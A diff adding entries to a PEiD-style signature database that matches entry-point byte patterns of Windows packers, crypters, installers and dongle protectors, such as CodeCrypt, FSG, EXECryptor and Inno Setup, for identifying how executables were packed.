+signature = 55 8B EC 81 C4 E4 FE FF FF 53 56 57 33 C0 89 45 F0 89 85
+ep_only = true
+
+[BopCrypt v1.0]
+signature = 60 BD ?? ?? ?? ?? E8 ?? ?? 00 00
+ep_only = true
+
+[CExe v1.0a]
+signature = 55 8B EC 81 EC 0C 02 ?? ?? 56 BE 04 01 ?? ?? 8D 85 F8 FE FF FF 56 50 6A ?? FF 15 54 10 40 ?? 8A 8D F8 FE FF FF 33 D2 84 C9 8D 85 F8 FE FF FF 74 16
+ep_only = true
+
+[CD-Cops II]
+signature = 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D
+ep_only = true
+
+[CodeCrypt v0.14b]
+signature = E9 C5 02 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[CodeCrypt v0.15b]
+signature = E9 31 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[CodeCrypt v0.16b - v0.163b]
+signature = E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F
+ep_only = true
+
+[CodeCrypt v0.164]
+signature = E9 2E 03 00 00 EB 02 83 3D 58 EB 02 FF 1D 5B EB 02 0F C7 5F EB 03 FF 1D 34
+ep_only = true
+
+[Code-Lock vx.x]
+signature = 43 4F 44 45 2D 4C 4F 43 4B 2E 4F 43 58 00
+ep_only = true
+
+[CodeSafe v2.0]
+signature = ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 EC 10 53 56 57 E8 C4 01 00
+ep_only = true
+
+[CopyControl v3.03]
+signature = CC 90 90 EB 0B 01 50 51 52 53 54 61 33 61 2D 35 CA D1 07 52 D1 A1 3C
+ep_only = true
+
+[CreateInstall Stub vx.x]
+signature = 55 8B EC 81 EC 20 02 00 00 53 56 57 6A 00 FF 15 18 61 40 00 68 00 70 40 00 89 45 08 FF 15 14 61 40 00 85 C0 74 27 6A 00 A1 00 20 40 00 50 FF 15 3C 61 40 00 8B F0 6A 06 56 FF 15 38 61 40 00 6A 03 56 FF 15 38 61 40 00 E9 36 03 00 00 68 02 7F 00 00 33 F6 56 BF 00 30 00 00 FF 15 20 61 40 00 50 FF 15 2C 61 40 00 6A 04 57 68 00 FF 01 00 56 FF 15 CC 60 40 00 6A 04 A3 CC 35 40 00 57 68 00 0F 01 00 56 FF 15 CC 60 40 00 68 00 01 00 00 BE B0 3F 40 00 56 A3 C4 30 40 00 FF 75 08 FF 15 10 61 40 00
+ep_only = true
+
+[Crunch/PE]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85
+ep_only = true
+
+[Crunch/PE v1.0.x.x]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 09 C6 85
+ep_only = true
+
+[Crunch/PE v2.0.x.x]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 55 BB ?? ?? ?? ?? 03 DD 53 64 67 FF 36 ?? ?? 64 67 89 26
+ep_only = true
+
+[Crunch/PE v3.0.x.x]
+signature = EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 74
+ep_only = true
+
+[Crunch v4.0]
+signature = EB 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 18 00 00 00 8B C5 55 60 9C 2B 85 E9 06 00 00 89 85 E1 06 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24 03 00 00 89 85 D9 41 00 00 68 EC 49 7B 79 33 C0 50 E8 11 03 00 00 89 85 D1 41 00 00 E8 67 05 00 00 E9 56 05 00 00 51 52 53 33 C9 49 8B D1 33 C0 33 DB AC 32 C1 8A CD 8A EA 8A D6 B6 08 66 D1 EB 66 D1 D8 73 09 66 35 20 83 66 81 F3 B8 ED FE CE 75 EB 33 C8 33 D3 4F 75 D5 F7 D2 F7 D1 5B 8B C2 C1 C0 10 66 8B C1 5A 59 C3 68 03 02 00 00 E8 80 04 00 00 0F 82 A8 02 00 00 96 8B 44 24 04 0F C8 8B D0 25 0F 0F 0F 0F 33 D0 C1 C0 08 0B C2 8B D0 25 33 33 33 33 33 D0 C1 C0 04 0B C2 8B D0 25 55 55 55 55 33 D0 C1 C0 02 0B C2
+ep_only = true
+
+[CrypKey v5 - v6]
+signature = E8 ?? ?? ?? ?? 58 83 E8 05 50 5F 57 8B F7 81 EF ?? ?? ?? ?? 83 C6 39 BA ?? ?? ?? ?? 8B DF B9 0B ?? ?? ?? 8B 06
+ep_only = true
+
+[CrypWrap vx.x]
+signature = E8 B8 ?? ?? ?? E8 90 02 ?? ?? 83 F8 ?? 75 07 6A ?? E8 ?? ?? ?? ?? FF 15 49 8F 40 ?? A9 ?? ?? ?? 80 74 0E
+ep_only = true
+
+[CICompress v1.0]
+signature = 6A 04 68 00 10 00 00 FF 35 9C 14 40 00 6A 00 FF 15 38 10 40 00 A3 FC 10 40 00 97 BE 00 20 40 00 E8 71 00 00 00 3B 05 9C 14 40 00 75 61 6A 00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 68 94 10 40 00 FF 15 2C 10 40 00 A3 F8 10 40 00 6A 00 68 F4 10 40 00 FF 35 9C 14 40 00 FF 35 FC 10 40 00 FF 35 F8 10 40 00 FF 15 34 10 40 00 FF 35 F8 10 40 00 FF 15 30 10 40 00 68 00 40 00 00 FF 35 9C 14 40 00 FF 35 FC 10 40 00 FF 15 3C 10 40 00 6A 00 FF 15 28 10 40 00 60 33 DB 33 C9 E8 7F 00 00 00 73 0A B1 08 E8 82 00 00 00 AA EB EF E8 6E 00 00 00 73 14 B1 04 E8 71 00 00 00 3C 00 74 EB 56 8B F7 2B F0 A4 5E EB D4 33 ED E8 51 00 00 00 72 10 B1 02 E8 54 00 00 00 3C 00 74 3B 8B E8 C1 C5 08 B1 08 E8 44 00 00 00 0B C5 50 33 ED E8 2E 00 00 00 72 0C B1 02 E8 31 00 00 00 8B E8 C1 C5 08
+ep_only = true
+
+[CipherWall Self-Extrator/Decryptor (GUI) v1.5]
+signature = 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 F9 89 C7 6A 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 52 10 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 0E 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4
+ep_only = true
+
+[CipherWall Self-Extrator/Decryptor (Console) v1.5]
+signature = 90 61 BE 00 10 42 00 8D BE 00 00 FE FF C7 87 C0 20 02 00 0B 6E 5B 9B 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 12 10 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 06 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4
+ep_only = true
+
+[DAEMON Protect v0.6.7]
+signature = 60 60 9C 8C C9 32 C9 E3 0C 52 0F 01 4C 24 FE 5A 83 C2 0C 8B 1A 9D 61
+ep_only = true
+
+[DEF v1.0]
+signature = BE ?? 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46
+ep_only = true
+
+[Ding Boy's PE-lock v0.07]
+signature = 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 23 35 40 00
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v0.8]
+signature = 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 0D 39 40 00
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v1.0 / v1.1]
+signature = 55 57 56 52 51 53 66 81 C3 EB 02 EB FC 66 81 C3 EB 02 EB FC
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v1.5b3]
+signature = 9C 55 57 56 52 51 53 9C FA E8 00 00 00 00 5D 81 ED 5B 53 40 00 B0
+ep_only = true
+
+[DBPE v1.53]
+signature = 9C 55 57 56 52 51 53 9C FA E8 ?? ?? ?? ?? 5D 81 ED 5B 53 40 ?? B0 ?? E8 ?? ?? ?? ?? 5E 83 C6 11 B9 27 ?? ?? ?? 30 06 46 49 75 FA
+ep_only = true
+
+[DBPE v2.10]
+signature = 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 01 E8 79 E0 7A 01 75 83 C4 04 9D EB 01 75 68 5F 20 40 ?? E8 B0 EF FF FF 72 03 73 01 75 BE
+ep_only = true
+
+[DBPE v2.10]
+signature = EB 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? EB 58 75 73 65 72 33 32 2E 64 6C 6C ?? 4D 65 73 73 61 67 65 42 6F 78 41 ?? 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C ?? 53 6C 65 65 70 ?? 47 65 74 54 69 63 6B 43 6F 75 6E 74
+ep_only = true
+
+[DBPE v2.33]
+signature = EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 01 E8 79 E0 7A 01 75 83
+ep_only = true
+
+[DBPE vx.xx]
+signature = EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED
+ep_only = true
+
+[DxPack 1.0]
+signature = 60 E8 ?? ?? ?? ?? 5D 8B FD 81 ED ?? ?? ?? ?? 2B B9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84
+ep_only = true
+
+[EP v1.0]
+signature = 50 83 C0 17 8B F0 97 33 C0 33 C9 B1 24 AC 86 C4 AC AA 86 C4 AA E2 F6 00 B8 40 00 03 00 3C 40 D2 33 8B 66 14 50 70 8B 8D 34 02 44 8B 18 10 48 70 03 BA 0C ?? ?? ?? ?? C0 33 FE 8B 30 AC 30 D0 C1 F0 10 C2 D0 30 F0 30 C2 C1 AA 10 42 42 CA C1 E2 04 5F E9 5E B1 C0 30 ?? 68 ?? ?? F3 00 C3 AA
+ep_only = true
+
+[EP v2.0]
+signature = 6A ?? 60 E9 01 01
+ep_only = true
+
+[ExeBundle v3.0 (standard loader)]
+signature = 00 00 00 00 60 BE 00 B0 42 00 8D BE 00 60 FD FF C7 87 B0 E4 02 00 31 3C 4B DF 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB
+ep_only = true
+
+[ExeBundle v3.0 (small loader)]
+signature = 00 00 00 00 60 BE 00 F0 40 00 8D BE 00 20 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11
+ep_only = true
+
+[Exe Shield vx.x]
+signature = 65 78 65 73 68 6C 2E 64 6C 6C C0 5D 00
+ep_only = true
+
+[Exe Shield v1.7]
+signature = EB 06 68 90 1F 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90
+ep_only = true
+
+[Exe Shield v2.7]
+signature = EB 06 68 F4 86 06 00 C3 9C 60 E8 02 00 00
+ep_only = true
+
+[Exe Shield v2.7b]
+signature = EB 06 68 40 85 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 87 DD 8B 85 E6 90 40 00 01 85 33 90 40 00 66 C7 85 30 90 40 00 90 90 01 85 DA 90 40 00 01 85 DE 90 40 00 01 85 E2 90 40 00 BB 7B 11 00 00 03 9D EA 90 40 00 03 9D E6 90 40 00 53 8B C3 8B FB 2D AC 90 40 00 89 85 AD 90 40 00 8D B5 AC 90 40 00 B9 40 04 00 00 F3 A5 8B FB C3 BD 00 00 00 00 8B F7 83 C6 54 81 C7 FF 10 00 00 56 57 57 56 FF 95 DA 90 40 00 8B C8 5E 5F 8B C1 C1 F9 02 F3 A5 03 C8 83 E1 03 F3 A4 EB 26 D0 12 5B 00 AC 12 5B 00 48 12 5B 00 00 00 40 00 00 D0 5A 00 00 10 5B 00 87 DB 87 DB 87 DB 87 DB 87 DB 87 DB 87 DB 8B 0E B5 E6 90 40 07 56 03 76 EE 0F 18 83 C6 14 12 35 97 80 8D BD 63 39 0D B9 06 86 02 07 F3 A5 6A 04 68 06 10 12 1B FF B5 51 29 EE 10 22 95
+ep_only = true
+
+[Exe Shield v2.9]
+signature = 60 E8 00 00 00 00 5D 81 ED 0B 20 40 00 B9 EB 08 00 00 8D BD 53 20 40 00 8B F7 AC ?? ?? ?? F8
+ep_only = true
+
+[EXE Stealth v1.1]
+signature = 60 E8 00 00 00 00 5D 81 ED FB 1D 40 00 B9 7B 09 00 00 8B F7 AC
+ep_only = true
+
+[EXE Stealth v2.7]
+signature = EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED D3 26 40
+ep_only = true
+
+[EXE Stealth v2.71]
+signature = EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED B0 27 40
+ep_only = true
+
+[EXE Stealth v2.72]
+signature = EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20
+ep_only = true
+
+[EXE Stealth v2.74 -> WebToolMaster]
+signature = EB 00 EB 17 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 90 E8 00 00 00 00 5D
+ep_only = true
+
+[EXE32Pack v1.36]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED CC 8D 40
+ep_only = true
+
+[EXE32Pack v1.37]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED 4C 8E 40
+ep_only = true
+
+[EXE32Pack v1.38]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED DC 8D 40
+ep_only = true
+
+[EXE32Pack v1.39]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED EC 8D 40
+ep_only = true
+
+[EXE32Pack v1.3x]
+signature = 3B ?? 74 02 81 83 55 3B ?? 74 02 81 ?? 53 3B ?? 74 01 ?? ?? ?? ?? ?? 02 81 ?? ?? E8 ?? ?? ?? ?? 3B 74 01 ?? 5D 8B D5 81 ED
+ep_only = true
+
+[EXECryptor v1.3.0.45]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1
+ep_only = true
+
+[EXECryptor v1.3.0.45]
+signature = E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1
+ep_only = true
+
+[EXECryptor v1.4.0.1]
+signature = E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 ?? ?? 00 31 C0 89 41 14 89 41 18 80
+ep_only = true
+
+[EXECryptor v1.5.1.x]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 C1 ?? ?? ?? FE C3 31 C0 64 FF 30 64 89 20 CC C3
+ep_only = true
+
+[EXECryptor vx.x.x.x]
+signature = E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41
+ep_only = true
+
+[EXEJoiner v1.0]
+signature = 68 00 10 40 00 68 04 01 00 00 E8 39 03 00 00 05 00 10 40 C6 00 5C 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 E8
+ep_only = true
+
+[ExeSmasher vx.x]
+signature = 9C FE 03 ?? 60 BE ?? ?? 41 ?? 8D BE ?? 10 FF FF 57 83 CD FF EB 10
+ep_only = true
+
+[EZIP v1.0]
+signature = E9 19 32 00 00 E9 7C 2A 00 00 E9 19 24 00 00 E9 FF 23 00 00 E9 1E 2E 00 00 E9 88 2E 00 00 E9 2C
+ep_only = true
+
+[FSG v1.0]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B
+ep_only = true
+
+[FSG v1.1]
+signature = BB D0 01 40 ?? BF ?? 10 40 ?? BE ?? ?? ?? ?? FC B2 80 8A 06 46 88 07 47 02 D2 75 05 8A 16
+ep_only = true
+
+[FSG v1.2]
+signature = 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 ?? 00 00 00 00 00
+ep_only = true
+
+[FSG v1.3]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE
+ep_only = true
+
+[FSG v1.31]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9
+ep_only = true
+
+[FSG v1.33]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73
+ep_only = true
+
+[Feokt]
+signature = 89 25 A8 11 40 00 BF ?? ?? ?? 00 31 C0 B9 ?? ?? ?? 00 29 F9 FC F3 AA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? 00 00 BE ?? ?? 40 00 BF
+ep_only = true
+
+[FixupPak v1.20]
+signature = 55 E8 00 00 00 00 5D 81 ED ?? ?? 00 00 BE 00 ?? 00 00 03 F5 BA 00 00 ?? ?? 2B D5 8B DD 33 C0 AC 3C 00 74 3D 3C 01 74 0E 3C 02 74 0E 3C 03 74 0D 03 D8 29 13 EB E7 66 AD EB F6 AD EB F3 AC 0F B6 C8 3C 00 74 06 3C 01 74 09 EB 0A 66 AD 0F B7 C8 EB 03 AD 8B C8 AC 0F B6 C0 03 D8 29 13 E2 FA EB BC 8D 85 ?? ?? 00 00 5D FF E0 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Gleam v1.00]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 EC 0C 53 56 57 E8 24 02 00
+ep_only = true
+
+[Guardant Stealth aka Novex Dongle]
+signature = 55 8B EC 83 C4 F0 60 E8 51 FF FF FF
+ep_only = true
+
+[Hasp dongle (Alladin)]
+signature = 50 53 51 52 57 56 8B 75 1C 8B 3E ?? ?? ?? ?? ?? 8B 5D 08 8A FB ?? ?? 03 5D 10 8B 45 0C 8B 4D 14 8B 55 18 80 FF 32
+ep_only = true
+
+[Hasp 4 envelope dongle (Alladin)]
+signature = 10 02 D0 51 0F 00 83
+ep_only = true
+
+[Hardlock dongle (Alladin)]
+signature = 5C 5C 2E 5C 48 41 52 44 4C 4F 43 4B 2E 56 58 44 00 00 00 00 5C 5C 2E 5C 46 45 6E 74 65 44 65 76
+ep_only = true
+
+[Inno Setup Module]
+signature = 49 6E 6E 6F 53 65 74 75 70 4C 64 72 57 69 6E 64 6F 77 00 00 53 54 41 54 49 43
+ep_only = true
+
+[Inno Setup Module]
+signature = 49 6E 6E 6F
+ep_only = true
+
+[Inno Setup Module v1.09a]
+signature = 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 C4 89 45 C0 E8 A7 7F FF FF E8 FA 92 FF FF E8 F1 B3 FF FF 33 C0
+ep_only = true
+
+[Inno Setup Module v1.2.9]
+signature = 55 8B EC 83 C4 C0 53 56 57 33 C0 89 45 F0 89 45 EC 89 45 C0 E8 5B 73 FF FF E8 D6 87 FF FF E8 C5 A9 FF FF E8 E0
+ep_only = true
+
+[Install Stub 32-bit]
+signature = 55 8B EC 81 EC 14 ?? 00 00 53 56 57 6A 00 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 29
+ep_only = true
+
+[InstallShield 2000]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 C4 ?? 53 56 57
+ep_only = true
+
+[JDPack]
+signature = 60 E8 ?? ?? ?? ?? 5D 8B D5 81 ED ?? ?? ?? ?? 2B 95 ?? ?? ?? ?? 81 EA 06 ?? ?? ?? 89 95 ?? ?? ?? ?? 83 BD 45
+ep_only = true
+
+[kryptor 3]
+signature = EB 66 87 DB
+ep_only = true
+
+[kryptor 5]
+signature = E8 03 ?? ?? ?? E9 EB 6C 58 40 FF E0
+ep_only = true
+
+[kryptor 6]
+signature = E8 03 ?? ?? ?? E9 EB 68 58 33 D2 74 02 E9 E9 40 42 75 02
+ep_only = true
+
+[kryptor 8]
+signature = EB 6A 87 DB
+ep_only = true
+
+[kryptor 9]
+signature = 60 E8 ?? ?? ?? ?? 5E B9 ?? ?? ?? ?? 2B C0 02 04 0E D3 C0 49 79 F8 41 8D 7E 2C 33 46 ?? 66 B9
+ep_only = true
+
+[Krypton v0.2]
+signature = 8B 0C 24 E9 0A 7C 01 ?? AD 42 40 BD BE 9D 7A 04
+ep_only = true
+
+[Krypton v0.3]
+signature = 8B 0C 24 E9 C0 8D 01 ?? C1 3A 6E CA 5D 7E 79 6D B3 64 5A 71 EA
+ep_only = true
+
+[Krypton v0.4]
+signature = 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 61 34 ?? ?? 2B 85 60 37 ?? ?? 83 E8 06
+ep_only = true
+
+[Krypton v0.5]
+signature = 54 E8 ?? ?? ?? ?? 5D 8B C5 81 ED 71 44 ?? ?? 2B 85 64 60 ?? ?? EB 43 DF
+ep_only = true
+
+[KGCrypt vx.x]
+signature = E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 64 A1 30 ?? ?? ?? 84 C0 74 ?? 64 A1 20 ?? ?? ?? 0B C0 74
+ep_only = true
+
+[LameCrypt v1.0]
+signature = 60 66 9C BB ?? ?? ?? ?? 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61
+ep_only = true
+
+[LTC v1.3]
+signature = 54 E8 00 00 00 00 5D 8B C5 81 ED F6 73 40 00 2B 85 87 75 40 00 83 E8 06
+ep_only = true
+
+[Lockless Intro Pack]
+signature = 2C E8 ?? ?? ?? ?? 5D 8B C5 81 ED F6 73 ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 06 89 85
+ep_only = true
+
+[LaunchAnywhere v4.0.0.1]
+signature = 55 89 E5 53 83 EC 48 55 B8 FF FF FF FF 50 50 68 E0 3E 42 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 68 C0 69 44 00 E8 E4 80 FF FF 59 E8 4E 29 00 00 E8 C9 0D 00 00 85 C0 75 08 6A FF E8 6E 2B 00 00 59 E8 A8 2C 00 00 E8 23 2E 00 00 FF 15 4C C2 44 00 89 C3 EB 19 3C 22 75 14 89 C0 8D 40 00 43 8A 03 84 C0 74 04 3C 22 75 F5 3C 22 75 01 43 8A 03 84 C0 74 0B 3C 20 74 07 3C 09 75 D9 EB 01 43 8A 03 84 C0 74 04 3C 20 7E F5 8D 45 B8 50 FF 15 E4 C1 44 00 8B 45 E4 25 01 00 00 00 74 06 0F B7 45 E8 EB 05 B8 0A 00 00 00 50 53 6A 00 6A 00 FF 15 08 C2 44 00 50 E8 63 15 FF FF 50 E8 EE 2A 00 00 59 8D 65 FC 5B
+ep_only = true
+
+[Microsoft CAB SFX module]
+signature = 55 8B EC 83 EC 44 56 FF 15 ?? 10 00 01 8B F0 8A 06 3C 22 75 14 8A 46 01 46 84 C0 74 04 3C 22 75 F4 80 3E 22 75 0D ?? EB 0A 3C 20
+ep_only = true
+
+[Macromedia Windows Flash Projector/Player v3.0]
